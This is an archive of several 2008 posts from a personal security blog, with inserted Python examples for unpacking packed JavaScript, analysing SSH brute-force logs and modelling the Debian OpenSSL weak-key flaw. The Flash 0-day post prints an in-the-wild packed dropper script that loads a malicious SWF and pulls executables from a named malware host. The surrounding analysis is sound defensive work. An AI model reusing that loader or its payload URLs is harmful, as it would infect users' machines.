Friday 30 May 2008

This is sweet :D

"AuthSight uses your Mac's iSight camera to take snapshots of the nut behind the keyboard whenever an invalid password is entered, either at login or in a screensaver. AuthSight can also (optionally) email photos to you."

Get it here. Thanks to Zac Bedell.

Wednesday 28 May 2008

Flash: the format everybody loves to hate [or at least should]

Prime time for our beloved Flash player again: a 0-day has been actively exploited over the last couple of days, as reported by SecurityFocus and SANS; Adobe does not know much more at the moment. [In the end the in-the-wild sample turned out to hit a bug Adobe had already fixed in Flash 9.0.124.0 in April, so the first thing to check is the installed player version.] It is served as a file with a .jpg extension that is actually a script:

http://www. play0nlnie. com/pcd/topics/ff11us/20080311cPxl31/07.jpg

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'\');2.3(\'
\')}W{2.3("")}}',62,73,'||document|write||expires|http|name|param|com|value|
20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|
width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|
userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|
toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess
|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia
|download|align|flash|swflash||version'.split('|'),0,{}))

Once decoded, the script first checks for a cookie named playon and sets it for 12 hours (so a browser is hit only once in that window), then writes an <object> tag for IE (an <embed> for other browsers) whose movie parameter points at 07.swf in the same directory as the fake jpg [the blog's HTML rendering has eaten the <object ...>, </object> and <embed ...> tags inside the string literals, which is why some of the document.write calls above look empty]. That SWF in the end downloads:
http://www. play0nlnie. com/ax.exe
&
http://www. play0nlnie. com/setip.exe

VirusTotal was at 7/31 for ax.exe and 7/31 for setip.exe earlier this evening.

Google gives a cool 359 results for the quoted string "Adobe Flash Player SWF File Unspecified Remote Code Execution Vulnerability", so the word is out.
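For readers who would rather not paste that into a browser: the following is an added example, not part of the original post, that unpacks this packer format statically. It reimplements the decode loop of the eval wrapper in Python and runs it over the dictionary the sample above carries plus the prefix of its payload that survived the blog's HTML rendering [the rest lost its <object> and <embed> tags]. The tiny wrapper string used to exercise the argument parser is constructed for the example.

```python
import re

# Added example (not code from the post): a static unpacker for output of the
# "eval(function(p,a,c,k,e,d){...})" packer used by the sample above, so the
# payload can be read without ever evaluating it.


def encode_token(index: int, radix: int) -> str:
    """The packer's e(): index -> base-`radix` token over 0-9, a-z, A-Z."""
    rest = "" if index < radix else encode_token(index // radix, radix)
    digit = index % radix
    if digit > 35:
        return rest + chr(digit + 29)  # 36..61 -> 'A'..'Z'
    return rest + (str(digit) if digit < 10 else chr(ord("a") + digit - 10))


def unpack(p: str, a: int, c: int, k: list) -> str:
    """Replace every word token in p by its dictionary entry. An empty entry
    means the token stands for itself (the packer leaves short literals alone)."""
    table = {}
    for i in range(c):
        tok = encode_token(i, a)
        table[tok] = k[i] if i < len(k) and k[i] else tok
    return re.sub(r"\b\w+\b", lambda m: table.get(m.group(0), m.group(0)), p, flags=re.ASCII)


# The four data arguments at the tail of the wrapper:  }('p',a,c,'k'.split('|')
PACKED_RE = re.compile(
    r"\}\s*\('((?:\\.|[^'\\])*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*'((?:\\.|[^'\\])*)'\.split\('\|'\)",
    re.S,
)


def unpack_source(source: str) -> str:
    """Pull p, a, c, k out of a complete eval(function(p,a,c,k,e,d){...}(...)) blob."""
    m = PACKED_RE.search(source)
    if not m:
        raise ValueError("no p,a,c,k,e,d wrapper found")
    unquote = lambda s: re.sub(r"\\(['\\])", r"\1", s)  # undo only the quote/backslash escapes
    return unpack(unquote(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4).split("|"))


# The 73-entry dictionary (radix 62) carried by the sample above, and the part of
# its payload that survived the blog's HTML rendering intact.
PAGE_DICT = "||document|write||expires|http|name|param|com|value|20080311cPxl31|swf|ff11us|pcd|topics|www|play0nlnie|playon|60|indexOf|width|height|if|src|07|cookie|object|msie|toLowerCase|d27cdb6e|11cf|96b8|ae6d|userAgent|clsid|classid|1000|setTime|Date|var|new|getTime|444553540000|toGMTString|path|Yes|navigator|cab|quality|high|movie|sameDomain|allowScriptAccess|bgcolor|ffffff|08|EMBED|else|embed|codebase|middle|shockwave|cabs||pub|macromedia|download|align|flash|swflash||version".split("|")
PAGE_FRAGMENT = (
    'n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);'
    '2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){'
)

# A small packed blob constructed for this example (not from the page).
CONSTRUCTED = (
    "eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp("
    "'\\\\b'+c.toString(36)+'\\\\b','g'),k[c])}}return p}"
    "('0 1=2;3(1)',62,4,'var|x|1|alert'.split('|'),0,{}))"
)

if __name__ == "__main__":
    print(unpack_source(CONSTRUCTED))
    print(unpack(PAGE_FRAGMENT, 62, 73, PAGE_DICT))
```

The decoded prefix reads: if(document.cookie.indexOf("playon=")==-1){var expires=new Date(); ... if(navigator.userAgent.toLowerCase().indexOf("msie")>0){, which is where the dictionary's object/classid/codebase/movie entries take over.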

Tuesday 27 May 2008

Arun Sarin is leaving Vodafone

What a pity!

We lost the most out-of-touch CEO ever, whose ideas, visions and quotes were always mind-bending.

Thursday 22 May 2008

gmail filter multiple domains


For some time I have been wondering how to implement my own idea of a zero inbox while keeping my Gmail filters clean and mean.

It took me a couple of searches to find the answer. It's simple: inside from:(...) you can separate the domains|names with a vertical bar '|' or with the 'OR' operator, but not with a comma. With the good old 'OR' clause you need the '(' and ')' around the list, like so:

Matches: from:((@komplett.nl OR @4launch.nl OR @livinstyle.nl OR @marketing.rackspace.co.uk OR @youthink.com OR @sourceforge.net OR @klm-email.com OR @service.swiss.com OR @dienstmakkers.nl OR @amsterdam.nl OR @honestreporting.com OR @ziki.com OR @opendns.com OR @enews.sierra-news.com OR @rapidshare.com OR @weekly.gamespy.com OR @nts.nl OR @nintendo-europe.com OR @ajax.nl OR @bol.com OR @sans.org OR @videoland.nl OR @sovereignlife.com OR @20min.ch OR @ringtonio.nl OR @2dehands.nl OR @davinciteam.com OR @mail.expedia.nl OR @looki.de OR @global-conflict.org OR @i3d.net OR @ebay.de OR @db2.myorc.com OR @mashmaker.intel.com OR @xing.com OR @firebrandtraining.co.uk OR @ipswitchmail.com OR @marktplaats.nl))
Do this: Skip Inbox, Apply label "XXX"

Nice. Inbox down to (243) unreads that I actually might read, one day... unless they get caught by my 'sorry, no time' filter that somehow flags messages as "dead wood" on triage.

Photo by Code Poet

Monday 19 May 2008

Times are changing...


I am from the time when dental correction was only cool when done invisibly. You would have your cavities filled, most of the time with amalgam, but that was for the poor [me]. The cooler people used plastic in the colour of their teeth.

Nowadays my kids _die_ for a super visible dental correction. The more 'bling' the better.

A good thing, in my book.

Friday 16 May 2008

SSH brute force botnet

Nice, I must have been asleep the last couple of days. Since May 11 02:41:53 my logfiles [which never sleep] started recording more 'advanced' SSH brute-force attempts. See this:

May 11 02:41:53 meij sshd[23046]: Failed keyboard-interactive/pam for invalid user tomcat from 168.243.236.228 port 56131 ssh2
May 11 04:36:27 meij sshd[23490]: Failed keyboard-interactive/pam for invalid user tsc from 190.12.74.11 port 57240 ssh2
May 11 07:07:29 meij sshd[24482]: Failed keyboard-interactive/pam for invalid user chang from 66.159.198.155 port 51730 ssh2
May 11 19:41:47 meij sshd[27408]: Failed keyboard-interactive/pam for invalid user backup from 196.211.44.154 port 12491 ssh2
May 11 19:42:58 meij sshd[27411]: Failed keyboard-interactive/pam for invalid user backup from 193.224.140.35 port 57552 ssh2
May 11 21:09:33 meij sshd[27738]: Failed keyboard-interactive/pam for invalid user postgres from 66.159.198.155 port 59462 ssh2
May 12 01:37:24 meij sshd[29026]: Failed keyboard-interactive/pam for invalid user thomas from 193.224.140.35 port 57325 ssh2
May 12 02:40:33 meij sshd[29258]: Failed keyboard-interactive/pam for invalid user franky from 66.193.161.130 port 49501 ssh2
May 12 03:20:11 meij sshd[29421]: Failed keyboard-interactive/pam for invalid user majordomo from 66.159.198.155 port 49959 ssh2
May 12 03:40:57 meij sshd[29482]: Failed keyboard-interactive/pam for invalid user shop from 212.24.179.54 port 42187 ssh2
May 12 03:58:24 meij sshd[29541]: Failed keyboard-interactive/pam for invalid user thisuserdoesnotexists from 88.191.50.77 port 58021 ssh2
[... snip ...]
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from 66.162.98.185 port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from 66.122.59.6 port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from 74.238.169.202 port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 72.254.69.226 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 211.232.103.213 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 213.134.152.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 194.94.205.135 port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from 85.207.127.98 port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 213.134.152.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 74.238.205.245 port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from 69.15.172.22 port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from 62.2.211.46 port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from 217.7.233.155 port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 64.73.250.213 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 221.8.255.134 port 42398 ssh2
[end.]

1209 attempts for 654 "invalid users" in 49 busy hours from 53 unique addresses [
grep "invalid user" /var/log/messages | awk '{ print $13 }' | sort | uniq | wc -l
] (plain uniq; uniq -u would throw away every address that shows up more than once). Not bad. Slipped nicely below my denyhosts radar.
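Added example, not from the post: the same lines run through a small Python analysis that counts attempts per source and per one-hour window. It shows why a per-source ban threshold, the DenyHosts model, never fires here while a distinct-sources-per-window rule does. The per-source threshold of 5 and the "ten distinct sources in an hour" rule are values assumed for the illustration, not DenyHosts settings, and the year is assumed to be 2008 because syslog lines carry none.

```python
import re
from collections import Counter
from datetime import datetime, timedelta

# Added example (not from the post): parse the sshd lines quoted above and
# compare a per-source block threshold with a per-window view. Threshold
# values are assumptions chosen for the illustration.

LINE_RE = re.compile(
    r"^(?P<mon>\w{3}) +(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed \S+ for invalid user (?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse(lines, year=2008):
    """Return sorted (timestamp, user, source) tuples; syslog has no year, 2008 assumed."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # '[... snip ...]' and other noise
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["user"], m["src"]))
    return sorted(events)


def analyze(lines, per_source_threshold=5, window=timedelta(hours=1), min_sources=10):
    events = parse(lines)
    per_source = Counter(src for _, _, src in events)
    blocked = sorted(s for s, n in per_source.items() if n >= per_source_threshold)
    peak, flagged = (0, 0, None), []
    for i, (start, _, _) in enumerate(events):
        in_win = [e for e in events[i:] if e[0] < start + window]
        sources = {e[2] for e in in_win}
        if len(in_win) > peak[0]:
            peak = (len(in_win), len(sources), start)
        if len(sources) >= min_sources:
            flagged.append(start)
    return {
        "attempts": len(events),
        "users": len({u for _, u, _ in events}),
        "sources": len(per_source),
        "max_per_source": max(per_source.values(), default=0),
        "blocked_by_per_source_threshold": blocked,  # what a DenyHosts-style rule would ban
        "peak_window": peak,                         # (attempts, distinct sources, window start)
        "distributed_windows": flagged,              # window starts that trip the distributed rule
    }


# The lines quoted in the post; the '[... snip ...]' gap is real and is not filled in.
SAMPLE_LOG = """\
May 11 02:41:53 meij sshd[23046]: Failed keyboard-interactive/pam for invalid user tomcat from 168.243.236.228 port 56131 ssh2
May 11 04:36:27 meij sshd[23490]: Failed keyboard-interactive/pam for invalid user tsc from 190.12.74.11 port 57240 ssh2
May 11 07:07:29 meij sshd[24482]: Failed keyboard-interactive/pam for invalid user chang from 66.159.198.155 port 51730 ssh2
May 11 19:41:47 meij sshd[27408]: Failed keyboard-interactive/pam for invalid user backup from 196.211.44.154 port 12491 ssh2
May 11 19:42:58 meij sshd[27411]: Failed keyboard-interactive/pam for invalid user backup from 193.224.140.35 port 57552 ssh2
May 11 21:09:33 meij sshd[27738]: Failed keyboard-interactive/pam for invalid user postgres from 66.159.198.155 port 59462 ssh2
May 12 01:37:24 meij sshd[29026]: Failed keyboard-interactive/pam for invalid user thomas from 193.224.140.35 port 57325 ssh2
May 12 02:40:33 meij sshd[29258]: Failed keyboard-interactive/pam for invalid user franky from 66.193.161.130 port 49501 ssh2
May 12 03:20:11 meij sshd[29421]: Failed keyboard-interactive/pam for invalid user majordomo from 66.159.198.155 port 49959 ssh2
May 12 03:40:57 meij sshd[29482]: Failed keyboard-interactive/pam for invalid user shop from 212.24.179.54 port 42187 ssh2
May 12 03:58:24 meij sshd[29541]: Failed keyboard-interactive/pam for invalid user thisuserdoesnotexists from 88.191.50.77 port 58021 ssh2
[... snip ...]
May 14 01:35:26 meij sshd[14831]: Failed keyboard-interactive/pam for invalid user orant from 66.162.98.185 port 45112 ssh2
May 14 01:41:32 meij sshd[14846]: Failed keyboard-interactive/pam for invalid user appen from 66.122.59.6 port 47129 ssh2
May 14 01:56:11 meij sshd[14904]: Failed keyboard-interactive/pam for invalid user bohmbach from 74.238.169.202 port 39950 ssh2
May 14 02:00:10 meij sshd[14947]: Failed keyboard-interactive/pam for invalid user braun from 72.254.69.226 port 2861 ssh2
May 14 02:03:16 meij sshd[14973]: Failed keyboard-interactive/pam for invalid user buesing from 211.232.103.213 port 29070 ssh2
May 14 02:04:40 meij sshd[14976]: Failed keyboard-interactive/pam for invalid user conrad from 213.134.152.66 port 3523 ssh2
May 14 02:08:27 meij sshd[14989]: Failed keyboard-interactive/pam for invalid user dregenus from 194.94.205.135 port 49358 ssh2
May 14 02:09:29 meij sshd[14992]: Failed keyboard-interactive/pam for invalid user duelsen from 85.207.127.98 port 44080 ssh2
May 14 02:14:26 meij sshd[15006]: Failed keyboard-interactive/pam for invalid user fellechn from 213.134.152.66 port 1294 ssh2
May 14 02:15:54 meij sshd[15033]: Failed keyboard-interactive/pam for invalid user fellechn from 74.238.205.245 port 47536 ssh2
May 14 02:17:27 meij sshd[15036]: Failed keyboard-interactive/pam for invalid user friebe from 69.15.172.22 port 2162 ssh2
May 14 02:20:52 meij sshd[15048]: Failed keyboard-interactive/pam for invalid user friese from 62.2.211.46 port 28917 ssh2
May 14 02:22:13 meij sshd[15051]: Failed keyboard-interactive/pam for invalid user fuhrhop from 217.7.233.155 port 58495 ssh2
May 14 02:24:51 meij sshd[15063]: Failed keyboard-interactive/pam for invalid user geffers from 64.73.250.213 port 45064 ssh2
May 14 02:26:40 meij sshd[15066]: Failed keyboard-interactive/pam for invalid user geffers from 221.8.255.134 port 42398 ssh2
"""

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG.splitlines()).items():
        print(f"{key}: {value}")
```

On the quoted lines no source gets past three attempts, so the per-source list stays empty, while the May 14 hour holds 15 attempts from 14 different addresses: the signal is in the spread of sources, not in any one of them.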

Thursday 15 May 2008

Euro 2008 champion: Russia

Today is speculation day :D

Switzerland - Czech Republic 2 - 1
Romania - France 0 - 2
Portugal - Turkey 1 - 1
Netherlands - Italy 3 - 2
Czech Republic - Portugal 2 - 1
Italy - Romania 2 - 1
Switzerland - Turkey 3 - 2
Netherlands - France 0 - 2
Switzerland - Portugal 1 - 2
Netherlands - Romania 2 - 1
Turkey - Czech Republic 0 - 0
France - Italy 1 - 2

Austria - Croatia 1 - 1
Spain - Russia 1 - 2
Germany - Poland 1 - 0
Greece - Sweden 1 - 3
Croatia - Germany 1 - 2
Sweden - Spain 0 - 2
Austria - Poland 3 - 1
Greece - Russia 1 - 2
Poland - Croatia 1 - 1
Greece - Spain 0 - 2
Austria - Germany 3 - 4
Russia - Sweden 2 - 1


Switzerland - Austria 3 - 1
Germany - Czech Republic 2 - 0

France - Spain 3 - 1
Russia - Italy 2 - 1


Switzerland - Germany 3 - 1
Spain - Russia 0 - 1

Switzerland - Russia 2 - 3

Euro 2008 champion: Russia

Speculation SSL Ubuntu & Thawte

Hmm, considering the fact that Mark Shuttleworth is the founder of both Thawte and Ubuntu...

And Ubuntu is Debian based

And Debian's OpenSSL suffers from a giant randomness issue

And www.thawte.com runs on Ubuntu

And Thawte is a large Certificate Authority

Does that imply all Thawte certificates are due for a review? :P

A great day for scripters!

The last months have been good for the security market. SPAM rose [it has been rising for 30 years, but who is counting?], BOTNETS grew, CC snooping got bigger, and two, well, astounding issues were added to the list within the last 24 hours.

First we have a crypto noob who decided to remove basically all randomness [the seed of the PRNG (Pseudo Random Number Generator) used when creating keys] from OpenSSL in Debian. That did not happen last week, nor last month, not even last year, but on Tue May 2 16:34:53 2006 UTC. For reasons that have been stated over and over again, non-security people should not, repeat NOT, fiddle with security code. Especially not packagers who just want things to build cleanly and silently. That bad.

In this case an unnamed individual did not like what a memory checker flagged as use of uninitialised data, and removed one line:
MD_Update(&m,buf,j);
That was enough to reduce the randomness of ALL keys generated on these systems [OpenSSL keys, and thus also the SSH keys that OpenSSH generates through OpenSSL] to 32,768 possibilities per key type, size and architecture: the process ID was the only input left, and Linux PIDs top out at 32768. That sounds like a lot to a human, it is nothing to a computer and to crypto it is fcuk all. It is so small that HD Moore generated all possible 1024-bit DSA and 2048-bit RSA keys for x86 in about two hours, using 31 Xeon cores clocked at 2.33 GHz. [Worse: a DSA key generated on a healthy system but then used to sign on a broken one is compromised as well, because the per-signature nonce came out of the same crippled PRNG.]

Luckily for the researchers, HD Moore of Metasploit moved quickly and created the Debian OpenSSL toolset WITHIN 24 HOURS[!!!] to toy with the issue.

Thank you. Scripters of the world: unite and have a ball!
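To make the 32,768 figure concrete, here is an added example that is not the post's and not OpenSSL's code: a toy generator whose only input is the PID, and the blacklist-by-fingerprint mitigation built from it, which is the shape of what openssl-blacklist and ssh-vulnkey did for the real keys. The SHA-256 stretching and the SHA-1 fingerprint are stand-ins for the illustration, not the real key derivation.

```python
import hashlib

# Added example (not from the post, and not OpenSSL's real PRNG or key
# generation): a stand-in generator whose only input is the process ID, which
# is what the Debian change left. It makes the size of the resulting key space
# concrete and shows the mitigation that followed: enumerate every key the
# broken generator can produce and blacklist the fingerprints.

PID_MAX = 32768  # default Linux pid_max, so PIDs 1..32767


def weak_key(pid: int, bits: int = 1024, arch: str = "x86") -> bytes:
    """Hypothetical key material derived from nothing but the PID (plus key
    size and architecture, which also select the key in the real case)."""
    out = b""
    counter = 0
    while len(out) * 8 < bits:
        out += hashlib.sha256(f"{arch}:{bits}:{pid}:{counter}".encode()).digest()
        counter += 1
    return out[: bits // 8]


def fingerprint(key: bytes) -> str:
    return hashlib.sha1(key).hexdigest()


def build_blacklist(bits: int = 1024, arch: str = "x86") -> dict:
    """Fingerprint -> PID for every key the generator can emit: 32767 entries."""
    return {fingerprint(weak_key(pid, bits, arch)): pid for pid in range(1, PID_MAX)}


def weak_pid(key: bytes, blacklist: dict):
    """PID that produced `key` if it is in the blacklist, else None."""
    return blacklist.get(fingerprint(key))


if __name__ == "__main__":
    bl = build_blacklist()
    victim = weak_key(4326)  # any PID will do
    print(len(bl), weak_pid(victim, bl), weak_pid(bytes(128), bl))
```

Building the whole table takes well under a second here; for real 2048-bit RSA keys the same enumeration is what took HD Moore his two hours of Xeon time, and the lookup side is exactly as cheap as it is in this toy.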

To bring the issue a little closer to your mom & pop [who hardly depend on SSH], Aviv Raff decided to post a real nice and nifty 0-day for IE. Scripters of the world, you know what to do.

This is a particularly nasty one, not just because it affects about 60% of all browsers in the world but also because our friends in Redmond just pushed out their monthly 'updates', so it will take at least another month before a patch is available, let alone the time it takes mom & pop to actually update their IE.

So life is good, money there is to be made for us security people. Or is it?

Wednesday 14 May 2008

Beta testers wanted for FERRET

Last October David Maynor went to the NASCAR truck series. Of course he brought his iPhone with him and was shocked to see so many open WiFi networks:


So what do you do when you made the headlines with your Ferret & Hamster releases in August 2007? You port Ferret [Hamster too? Maybe? Please?] to the iPhone.

Now they are looking for beta testers with open iPhones. Feel up to the challenge?

Check here!

Happy Birthday Ha'Aretz!



Never will I forget how we met, how the initial moments were, how deeply I was moved by you and what a profound impact you made on me and my life.

It was a coincidence, no really, it was. It was not as if my life was aimed at that particular event, not that I was brought up to come to you, not that I had any known desire to experience you. It was purely coincidental that we met. Or was it? Was it not so that in my family your name was uttered in soft words of the highest respect? Was it not so that the 'coded' words my grandparents & parents whispered to each other, hidden from us kids, when saying goodbye, were words that ended with something like '...Jerusalem'?

It does not matter. Fact is, on December the 27th, in the year 1989, you welcomed me. Fact is that ever since that day there is no place on earth that has touched me deeper, felt better, or shines brighter than you.

Happy birthday, state of Israel. May you and your inhabitants live, prosper & find the peace and integrity you deserve.

Friday 9 May 2008

Maths is the music of reason




A musician wakes from a terrible nightmare. In his dream he finds himself in a society where music education has been made mandatory. “We are helping our students become more competitive in an increasingly sound-filled world.” Educators, school systems, and the state are put in charge of this vital project. Studies are commissioned, committees are formed, and decisions are made— all without the advice or participation of a single working musician or composer.

Since musicians are known to set down their ideas in the form of sheet music, these curious black dots and lines must constitute the “language of music.” It is imperative that students become fluent in this language if they are to attain any degree of musical competence; indeed, it would be ludicrous to expect a child to sing a song or play an instrument without having a thorough grounding in music notation and theory. Playing and listening to music, let alone composing an original piece, are considered very advanced topics and are generally put off until college, and more often graduate school.

As for the primary and secondary schools, their mission is to train students to use this language— to jiggle symbols around according to a fixed set of rules: “Music class is where we take out our staff paper, our teacher puts some notes on the board, and we copy them or transpose them into a different key. We have to make sure to get the clefs and key signatures right, and our teacher is very picky about making sure we fill in our quarter-notes completely. One time we had a chromatic scale problem and I did it right, but the teacher gave me no credit because I had the stems pointing the wrong way.”

In their wisdom, educators soon realize that even very young children can be given this kind of musical instruction. In fact it is considered quite shameful if one’s third-grader hasn’t completely memorized his circle of fifths. “I’ll have to get my son a music tutor. He simply won’t apply himself to his music homework. He says it’s boring. He just sits there staring out the window, humming tunes to himself and making up silly songs.”

In the higher grades the pressure is really on. After all, the students must be prepared for the standardized tests and college admissions exams. Students must take courses in Scales and Modes, Meter, Harmony, and Counterpoint. “It’s a lot for them to learn, but later in college when they finally get to hear all this stuff, they’ll really appreciate all the work they did in high school.” Of course, not many students actually go on to concentrate in music, so only a few will ever get to hear the sounds that the black dots represent. Nevertheless, it is important that every member of society be able to recognize a modulation or a fugal passage, regardless of the fact that they will never hear one. “To tell you the truth, most students just aren’t very good at music. They are bored in class, their skills are terrible, and their homework is barely legible. Most of them couldn’t care less about how important music is in today’s world; they just want to take the minimum number of music courses and be done with it. I guess there are just music people and non-music people. I had this one kid, though, man was she sensational! Her sheets were impeccable— every note in the right place, perfect calligraphy, sharps, flats, just beautiful. She’s going to make one hell of a musician someday.”


Waking up in a cold sweat, the musician realizes, gratefully, that it was all just a crazy dream. “Of course!” he reassures himself, “No society would ever reduce such a beautiful and meaningful art form to something so mindless and trivial; no culture could be so cruel to its children as to deprive them of such a natural, satisfying means of human expression. How absurd!”

Meanwhile, on the other side of town, a painter has just awakened from a similar nightmare…

***********
And all this leads us into a wonderfully written essay on how we are messing up the love and purity of math for our kids. Written by Paul Lockhart [and NO, that is NOT the Space Invader Paul Lockhart], an assistant professor at Brown who left to teach a mathematician's point of view to very young children. In his own words, "I want them to understand that there is a playground in their minds and that that is where mathematics happens. So far I have met with tremendous enthusiasm among the parents and kids, less so among the mid-level administrators." Is that so :P

BTW, if anybody speaks to Paul, can you please ask him to start blogging or publishing more in any other way, shape or form?

An eye opener and good read to boot. Enjoy it!

Thursday 8 May 2008

HELP: Linkedin removed my profile! [well, not mine, really]

What gives? A colleague of mine ran into my office and asked me to check LinkedIn to see if I could find his profile. We are connected, so, sure, I checked my connections. Since I am known to make a spelling error or two, especially with names, I was not convinced that something was wrong when I did not find him in my connections list.



So I used Google, which loves LinkedIn profiles, to see if I had his name correct: I did.







As a matter of fact, Google had nicely cached his profile page on LinkedIn. CCIE number et al. So for sure neither he nor I is nuts; he did have a LinkedIn profile and we are connected. Something must be wrong with my search on LinkedIn, right?

Let's copy & paste that name, and CCIE serial, and repeat the search.


No matter what we tried, all we found was this "Dell sales dude" but never the hardcore networker who stood behind me, whom I had linked to, and whom Google had cached.






So I tried some Google-fu to see if more people had had their profile removed by LinkedIn, but all I found was people who had asked to be removed themselves, and happy faces that LinkedIn finally lets you remove links to people you once linked to. Silently, to make sure you piss nobody off :P

This is an interesting issue however.

I always check people's LinkedIn profiles when I do job interviews or have business meetings planned with people I do not know. It often helps to use the correct wording [or metaphors when clueless] when you know a little bit about their [public] background. I know many future employers do the same [Hi guys! I see you browse my profile before you call :D].

But what happens if you can't find that potential new employee on LinkedIn and you know nothing about her|him? Will it influence your initial selection of who to talk to and who not? I am sure it does for lots of companies. Never mind how smart that is, but it is done.

So what do you do when you drop off the most valuable professional showroom on the net? How does one prevent that from happening, or from having too big an impact on your money-making abilities?

Wednesday 7 May 2008

Imagine being Vodafone and bending over for Apple...

What do you get after initially big-mouthing Steve at the launch of the iPhone, claiming you know it all because you have been in the GSM cloud business for so long?

You get the leftovers, the 2G countries, like: Australia, the Czech Republic, Egypt, Greece, Italy, India, Portugal, New Zealand, South Africa and Turkey. And those you don't even get exclusively, muwaa!!!

Being able to offload 2G handsets into secondary markets will be very useful for Apple if they do launch a 3G version of the iPhone as generally expected.

Now, Arun Sarin has been labeled strange and basically clueless before. Being out of touch with reality really scares the shit out of people working in his company, but who knows, now that he has found his way into Apple's $ stream, maybe the good people working at Vodafone will get a break and develop something nice. Maybe. Then again, it is more likely the big shot sees no need for cool iPhone apps and will be happy with the pennies and cents he is allowed to keep for the devices he sells, business as usual.

Tuesday 6 May 2008

opendns resolve issue? no, it's squid.

For reasons known only to my shrink, I wanted Firefox to use a tunnel from a Windows XP machine to an OpenSUSE Linux host, resolving via OpenDNS and going through squid to make things complete.

Funny stuff, that I do just because I can.

It is all really easy to get up and running, nice to have your own tools on a stick and funnel your wild browsing behaviour, encrypted, to a known end point where you set it free into the world wild web. But trust is good, a functional test is better, and checking is best, as my audit teacher taught me. So the first thing I did was monitor for data leakage on my local [Windows host's] interface: nada. Schade.

Then I went to the remote host's interface to see what showed up there: horror, nice! What I saw was part of the resolver queries going to my old and reliable [and we all hate reliable, right?] colocation DNS and part of the queries to OpenDNS. Hmm, makes you wonder. So checking the resolver file showed that I had correctly added the two OpenDNS entries and correctly removed the entries passed into the file via DHCP. I flushed the DNS cache, still no joy. Hmm, makes you wonder. Turned out it was squid not picking up the new entries in the resolver file: squid reads /etc/resolv.conf when it starts, not on every lookup. Naughty squid!

My setup in more detail:

Firefox [2.0.0.14 on WinXP SP2]; well, actually it is FirefoxPortable on a 16GB Flash Voyager.
PuTTY [version 0.60] for a tunnel to an external host, listening on 127.0.0.1:8888 and forwarding to 127.0.0.1:3128 on the remote side, where squid [Version 2.5.STABLE10] runs on SuSE [kernel 2.6.13-15.18, i386].

I have added a boolean option in Firefox's about:config page named network.proxy.socks_remote_dns and set it to true. [That preference only matters when Firefox talks to a SOCKS proxy; with the browser pointed at squid, an HTTP proxy, it never resolves names itself, squid does.]

The resolver file on the remote host contains:
cat /etc/resolv.conf
### BEGIN INFO
#
# Modified_by:  dhcpcd
# Backup:       /etc/resolv.conf.saved.by.dhcpcd.eth0
# Process:      dhcpcd
# Process_id:   4326
# Script:       /sbin/modify_resolvconf
# Saveto:
# Info:         This is a temporary resolv.conf created by service dhcpcd.
#               The previous file has been saved and will be restored later.
#
#               If you don't like your resolv.conf to be changed, you
#               can set MODIFY_{RESOLV,NAMED}_CONF_DYNAMICALLY=no. This
#               variables are placed in /etc/sysconfig/network/config.
#
#               You can also configure service dhcpcd not to modify it.
#
#               If you don't like dhcpcd to change your nameserver
#               settings then either set DHCLIENT_MODIFY_RESOLV_CONF=no
